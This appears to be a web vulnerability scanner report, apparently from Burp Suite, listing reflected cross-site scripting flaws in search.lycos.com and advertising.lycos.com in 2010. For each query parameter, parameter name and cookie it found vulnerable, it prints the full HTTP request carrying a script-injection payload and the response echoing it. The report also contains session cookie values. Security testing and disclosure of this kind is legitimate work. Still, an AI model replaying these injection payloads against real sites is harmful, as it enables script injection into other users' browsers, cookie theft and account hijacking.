GET /?tab=web&query=%2734964"%3balert(1)//0334fee274d&x=0&y=0&mobile=1 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=1; expires=Mon, 12-Dec-2011 14:35:12 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12560
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf21"><script>alert(1)</script>170bf3715a3 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query= HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PARTNER=lycos502bf21%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E170bf3715a3 Set-Cookie: PARTNER=deleted; expires=Sat, 12-Dec-2009 14:35:02 GMT P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query=&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714e4"><script>alert(1)</script>1c8e17eea03 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web714e4"><script>alert(1)</script>1c8e17eea03&query=%27&x=0&y=0 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:07 GMT; path=/ Set-Cookie: LYCOS_SEARCH=0roaos6kqiohp2a9qr66pi4uc3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_web714e4"><script>alert(1)</script>1c8e17eea03&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb19"><script>alert(1)</script>384854fefb5 was submitted in the x parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:17 GMT; path=/ Set-Cookie: LYCOS_SEARCH=3nnouoedqulhb6jgumc9falmu4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0&mobile=1"> ...[SNIP]...
The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427d8"><script>alert(1)</script>ca48fe7296 was submitted in the y parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:19 GMT; path=/ Set-Cookie: LYCOS_SEARCH=opld2sr244q0u26cc1hfeg7cj7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296&mobile=1"> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d10"><script>alert(1)</script>11d3b1192c5 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /image/?tab=multi&cat=imagesb8d10"><script>alert(1)</script>11d3b1192c5 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_imagesb8d10"><script>alert(1)</script>11d3b1192c5&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67115"%3balert(1)//4e88d6bcb17 was submitted in the cat parameter. This input was echoed as 67115";alert(1)//4e88d6bcb17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/?tab=multi&cat=images67115"%3balert(1)//4e88d6bcb17 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17524
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_images67115";alert(1)//4e88d6bcb17"; //--> ...[SNIP]...
3.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/image/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc05"><script>alert(1)</script>f6d897429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /image/?acc05"><script>alert(1)</script>f6d897429=1 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?acc05"><script>alert(1)</script>f6d897429=1&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf1c"><script>alert(1)</script>be82f60f06e was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /image/?tab=multiaaf1c"><script>alert(1)</script>be82f60f06e&cat=images HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multiaaf1c"><script>alert(1)</script>be82f60f06e&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50828"%3balert(1)//3e5bc5531b2 was submitted in the cat parameter. This input was echoed as 50828";alert(1)//3e5bc5531b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/?tab=multi&cat=video50828"%3balert(1)//3e5bc5531b2 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17520
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_video50828";alert(1)//3e5bc5531b2"; //--> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de7a"><script>alert(1)</script>0aa4e76c954 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/?tab=multi&cat=video7de7a"><script>alert(1)</script>0aa4e76c954 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_video7de7a"><script>alert(1)</script>0aa4e76c954&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
3.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><script>alert(1)</script>9c23e31d9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/?2baf1"><script>alert(1)</script>9c23e31d9b9=1 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?2baf1"><script>alert(1)</script>9c23e31d9b9=1&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae732"><script>alert(1)</script>fc2ad86c0a was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/?tab=multiae732"><script>alert(1)</script>fc2ad86c0a&cat=video HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multiae732"><script>alert(1)</script>fc2ad86c0a&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f38a"%3balert(1)//20a4f660a78 was submitted in the diktfc cookie. This input was echoed as 2f38a";alert(1)//20a4f660a78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: advertising.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a"%3balert(1)//20a4f660a78; PENTA=174.121.222.18.1292163892141045
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:26:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15452
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7045"><script>alert(1)</script>e23721f874e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
